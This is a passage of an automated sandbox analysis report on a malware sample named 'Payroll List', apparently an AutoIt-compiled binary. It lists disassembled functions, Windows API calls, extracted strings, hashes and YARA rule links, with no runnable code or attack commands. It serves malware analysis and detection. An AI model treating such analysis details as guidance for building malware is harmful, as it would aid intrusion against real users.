                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0012CABE
                                                                      • Part of subcall function 0012B337: _wcscpy.LIBCMT ref: 0012B36F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$_wcscpy$FullNamePath__wsplitpath__wsplitpath_helper_wcscat
                                                                    • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                    • API String ID: 2258743419-1018226102
                                                                    • Opcode ID: 3881469397f966a7e89bfc0af88f0f12d424d9b929d7b2a2dab1bab784bb8953
                                                                    • Instruction ID: 4c48b9c85da09d96bee5217d5761d1c7b7e0a6fa55f82d59a7d0c306ff2fc409
                                                                    • Opcode Fuzzy Hash: 3881469397f966a7e89bfc0af88f0f12d424d9b929d7b2a2dab1bab784bb8953
                                                                    • Instruction Fuzzy Hash: B012A2715083419FCB24EF24D891AAFBBF5BFA9304F00491EF59993261DB30DA59CB92
                                                                    Function 0018CE58 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _memset.LIBCMT ref: 0018CEFB
                                                                    • DestroyWindow.USER32(?,?), ref: 0018CF73
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0018CFF4
                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0018D016
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018D025
                                                                    • DestroyWindow.USER32(?), ref: 0018D042
                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00120000,00000000), ref: 0018D075
                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0018D094
                                                                    • GetDesktopWindow.USER32 ref: 0018D0A9
                                                                    • GetWindowRect.USER32(00000000), ref: 0018D0B0
                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0018D0C2
                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0018D0DA
                                                                      • Part of subcall function 0013B526: GetWindowLongW.USER32(?,000000EB), ref: 0013B537
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memset
                                                                    • String ID: 0$tooltips_class32
                                                                    • API String ID: 3877571568-3619404913
                                                                    • Opcode ID: da9941931f795dc8603504a08d0cffb6c542186ce96ac7466560871d6766633d
                                                                    • Instruction ID: a3947323f43bdb5591b5062f2bb224330098f97fe4b096731188e4f8eaf6593e
                                                                    • Opcode Fuzzy Hash: da9941931f795dc8603504a08d0cffb6c542186ce96ac7466560871d6766633d
                                                                    • Instruction Fuzzy Hash: D871FFB4140345AFD724DF68EC84FAA77E5EB89704F48451DF9858B2A1D770EA82CF22
                                                                    Function 0018F351 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 178windowfileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0018F37A
                                                                      • Part of subcall function 0018D7DE: ClientToScreen.USER32(?,?), ref: 0018D807
                                                                      • Part of subcall function 0018D7DE: GetWindowRect.USER32(?,?), ref: 0018D87D
                                                                      • Part of subcall function 0018D7DE: PtInRect.USER32(?,?,0018ED5A), ref: 0018D88D
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0018F3E3
                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0018F3EE
                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0018F411
                                                                    • _wcscat.LIBCMT ref: 0018F441
                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0018F458
                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0018F471
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0018F488
                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0018F4AA
                                                                    • DragFinish.SHELL32(?), ref: 0018F4B1
                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0018F59C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                    • API String ID: 169749273-3440237614
                                                                    • Opcode ID: 2936fc03a8dd7a2ef3d0ac7d8724ba8490e8d68199cabf620345f5c5d17dc298
                                                                    • Instruction ID: 16ea08853db2a056b8167668f2cec1b94b6b883b1ae589f37dffc2497976cfa4
                                                                    • Opcode Fuzzy Hash: 2936fc03a8dd7a2ef3d0ac7d8724ba8490e8d68199cabf620345f5c5d17dc298
                                                                    • Instruction Fuzzy Hash: 4E612871108300AFC711EF64EC85E9FBBF8EF99710F000A1EF695965A1DB709A59CB52
                                                                    Function 0016AAF8 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 374timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0016AB3D
                                                                    • VariantCopy.OLEAUT32(?,?), ref: 0016AB46
                                                                    • VariantClear.OLEAUT32(?), ref: 0016AB52
                                                                    • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0016AC40
                                                                    • __swprintf.LIBCMT ref: 0016AC70
                                                                    • VarR8FromDec.OLEAUT32(?,?), ref: 0016AC9C
                                                                    • VariantInit.OLEAUT32(?), ref: 0016AD4D
                                                                    • SysFreeString.OLEAUT32(00000016), ref: 0016ADDF
                                                                    • VariantClear.OLEAUT32(?), ref: 0016AE35
                                                                    • VariantClear.OLEAUT32(?), ref: 0016AE44
                                                                    • VariantInit.OLEAUT32(00000000), ref: 0016AE80
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                    • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                    • API String ID: 3730832054-3931177956
                                                                    • Opcode ID: 53fbc18ab717b906fee6c80863d99ae4ab3d13cb09c55c3eea120fb6a59972be
                                                                    • Instruction ID: 4a797848a939fa996005bc602609bd628925d2b756f127285471070126473a39
                                                                    • Opcode Fuzzy Hash: 53fbc18ab717b906fee6c80863d99ae4ab3d13cb09c55c3eea120fb6a59972be
                                                                    • Instruction Fuzzy Hash: 48D10071A04225EBCB249F65DC84BAEF7B9FF09700F558059E405AB581DB70ECA0DFA2
                                                                    Function 0018716A Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 244windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?), ref: 001871FC
                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00187247
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharMessageSendUpper
                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                    • API String ID: 3974292440-4258414348
                                                                    • Opcode ID: f8e27af447982313d7615bf6fdcaf21f2a16636c7defbd7d4402ffad6147c506
                                                                    • Instruction ID: 2b84944f5e3ca7c6f5e34051f7e27ed2ec869eaac176dd4daf2359e166fead13
                                                                    • Opcode Fuzzy Hash: f8e27af447982313d7615bf6fdcaf21f2a16636c7defbd7d4402ffad6147c506
                                                                    • Instruction Fuzzy Hash: F2914E342087119FCB04FF24D851A6EB7A1BF64314F114859F89A6B7E2DB30EE5ADB81
                                                                    Function 0018E4F5 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 199windowlibraryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0018E5AB
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,0018BEAF), ref: 0018E607
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E647
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E68C
                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0018E6C3
                                                                    • FreeLibrary.KERNEL32(?,00000004,?,?,?,?,0018BEAF), ref: 0018E6CF
                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0018E6DF
                                                                    • DestroyIcon.USER32(?,?,?,?,?,0018BEAF), ref: 0018E6EE
                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0018E70B
                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0018E717
                                                                      • Part of subcall function 00140FA7: __wcsicmp_l.LIBCMT ref: 00141030
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                    • String ID: .dll$.exe$.icl
                                                                    • API String ID: 1212759294-1154884017
                                                                    • Opcode ID: 4813828ffd6076e5f4aa60cf17e40a215f4d02225bff10251e6f51bc62117563
                                                                    • Instruction ID: 430784ea743cfe8d8470351392cca3386a0fa2ecb8b12c56166d6a1fbc12c655
                                                                    • Opcode Fuzzy Hash: 4813828ffd6076e5f4aa60cf17e40a215f4d02225bff10251e6f51bc62117563
                                                                    • Instruction Fuzzy Hash: 6B61CF71500615FBEB14EF64DC46FFE7BA8BB18714F204115F915E61D0EB709A90CBA0
                                                                    Function 0016D219 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0012936C: __swprintf.LIBCMT ref: 001293AB
                                                                      • Part of subcall function 0012936C: __itow.LIBCMT ref: 001293DF
                                                                    • CharLowerBuffW.USER32(?,?), ref: 0016D292
                                                                    • GetDriveTypeW.KERNEL32 ref: 0016D2DF
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016D327
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016D35E
                                                                    • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0016D38C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: SendString$BuffCharDriveLowerType__itow__swprintf
                                                                    • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                    • API String ID: 1148790751-4113822522
                                                                    • Opcode ID: b3327f0b6cb209e3cc725f519d1677102a5d03fc11845e5f683e91d6b410ee8a
                                                                    • Instruction ID: 46860959421786aa360cb1f9acc91e3a833a97583722c2bb788e893dbd7da087
                                                                    • Opcode Fuzzy Hash: b3327f0b6cb209e3cc725f519d1677102a5d03fc11845e5f683e91d6b410ee8a
                                                                    • Instruction Fuzzy Hash: 75514E716047159FC700EF10D98196EB7E4FFA8758F00486DF89AA7291DB31EE15CB92
                                                                    Function 001626BC Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 137windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000016,00000000,?,?,00193973,00000016,0000138C,00000016,?,00000016,001BDDB4,00000000,?), ref: 001626F1
                                                                    • LoadStringW.USER32(00000000,?,00193973,00000016), ref: 001626FA
                                                                    • GetModuleHandleW.KERNEL32(00000000,00000016,?,00000FFF,?,?,00193973,00000016,0000138C,00000016,?,00000016,001BDDB4,00000000,?,00000016), ref: 0016271C
                                                                    • LoadStringW.USER32(00000000,?,00193973,00000016), ref: 0016271F
                                                                    • __swprintf.LIBCMT ref: 0016276F
                                                                    • __swprintf.LIBCMT ref: 00162780
                                                                    • _wprintf.LIBCMT ref: 00162829
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00162840
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString__swprintf$Message_wprintf
                                                                    • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                    • API String ID: 618562835-2268648507
                                                                    • Opcode ID: 4e19e5b1972a549542f13e90198375fedcc2efe804da8ca5f813948bc207fc5c
                                                                    • Instruction ID: 029cb91c52f4f8fc37e1785bddca94b39676fc63c5191fd210565d188318472d
                                                                    • Opcode Fuzzy Hash: 4e19e5b1972a549542f13e90198375fedcc2efe804da8ca5f813948bc207fc5c
                                                                    • Instruction Fuzzy Hash: ED411E72800629BACB14FBD0ED86DEEB779AF65340F100065F60177092EB746F69CBA1
                                                                    Function 0016D0B8 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 101fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0016D0D8
                                                                    • __swprintf.LIBCMT ref: 0016D0FA
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 0016D137
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0016D15C
                                                                    • _memset.LIBCMT ref: 0016D17B
                                                                    • _wcsncpy.LIBCMT ref: 0016D1B7
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0016D1EC
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0016D1F7
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 0016D200
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0016D20A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 2733774712-3457252023
                                                                    • Opcode ID: 8eb1c3c080b54590bdf10b40528112f11d612a1c8a79bbea4376c07e5149ba22
                                                                    • Instruction ID: a8648a919486d58e16bf599dd36b52cd189a399cc595282503a7ddaf8ce60fe9
                                                                    • Opcode Fuzzy Hash: 8eb1c3c080b54590bdf10b40528112f11d612a1c8a79bbea4376c07e5149ba22
                                                                    • Instruction Fuzzy Hash: 9931C8B5A00109ABDB21DFA0EC49FEB37BDEF89700F1040BAF509D2160E7709695CB24
                                                                    Function 0018E731 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0018BEF4,?,?), ref: 0018E754
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E76B
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E776
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E783
                                                                    • GlobalLock.KERNEL32(00000000), ref: 0018E78C
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E79B
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 0018E7A4
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E7AB
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0018BEF4,?,?,00000000,?), ref: 0018E7BC
                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,001AD9BC,?), ref: 0018E7D5
                                                                    • GlobalFree.KERNEL32(00000000), ref: 0018E7E5
                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0018E809
                                                                    • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0018E834
                                                                    • DeleteObject.GDI32(00000000), ref: 0018E85C
                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0018E872
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                    • String ID:
                                                                    • API String ID: 3840717409-0
                                                                    • Opcode ID: a1952038365c21078b7c7f3d16b44206d1dbd83cd6d6a914b6826232ff8039ce
                                                                    • Instruction ID: e12a65b8b9fd15d7502e6429d5f942f18fe0f80f62e3e5de94795e4c1a9007b4
                                                                    • Opcode Fuzzy Hash: a1952038365c21078b7c7f3d16b44206d1dbd83cd6d6a914b6826232ff8039ce
                                                                    • Instruction Fuzzy Hash: 5D412875600604EFDB119FA5EC88EAE7BB9EF8A715F108058F90697660D7309A81DF60
                                                                    Function 001705F8 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • __wsplitpath.LIBCMT ref: 0017076F
                                                                    • _wcscat.LIBCMT ref: 00170787
                                                                    • _wcscat.LIBCMT ref: 00170799
                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 001707AE
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 001707C2
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 001707DA
                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 001707F4
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00170806
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                    • String ID: *.*
                                                                    • API String ID: 34673085-438819550
                                                                    • Opcode ID: 7aee4737671c42b3d059a232da73d8479eb09f079d5cdcce8c8a1d6de8ddc5d5
                                                                    • Instruction ID: 1c2a01286c9181060c39b81051287f94a8d9290a469acca0f54a1679e1f1032f
                                                                    • Opcode Fuzzy Hash: 7aee4737671c42b3d059a232da73d8479eb09f079d5cdcce8c8a1d6de8ddc5d5
                                                                    • Instruction Fuzzy Hash: 2E816C71904301DFCB25EF64C85596AB7F8BB9D304F18882EF889D7251EB30ED958B92
                                                                    Function 0018EEEB Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 0013B34E: GetWindowLongW.USER32(?,000000EB), ref: 0013B35F
                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0018EF3B
                                                                    • GetFocus.USER32 ref: 0018EF4B
                                                                    • GetDlgCtrlID.USER32(00000000), ref: 0018EF56
                                                                    • _memset.LIBCMT ref: 0018F081
                                                                    • GetMenuItemInfoW.USER32 ref: 0018F0AC
                                                                    • GetMenuItemCount.USER32(00000000), ref: 0018F0CC
                                                                    • GetMenuItemID.USER32(?,00000000), ref: 0018F0DF
                                                                    • GetMenuItemInfoW.USER32(00000000,-00000001,00000001,?), ref: 0018F113
                                                                    • GetMenuItemInfoW.USER32(00000000,?,00000001,?), ref: 0018F15B
                                                                    • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0018F193
                                                                    • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0018F1C8
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1434529899.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                                                                    • Associated: 00000000.00000002.1434515364.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434585931.00000000001CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434630599.00000000001DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1434647115.00000000001E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_120000_Payroll List.jbxd
                                                                    Similarity
                                                                    • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                    • String ID: 0
                                                                    • API String ID: 1296962147-4108050209
                                                                    • Opcode ID: 8ed08d3f1ecabde64b2483047bc79dcc077eac59e82f6b85ca6a929d273b9ce6
                                                                    • Instruction ID: 71884d721e473586f84a411ab9ed076957dcc50ae21a103c487ae52f60cb6d54
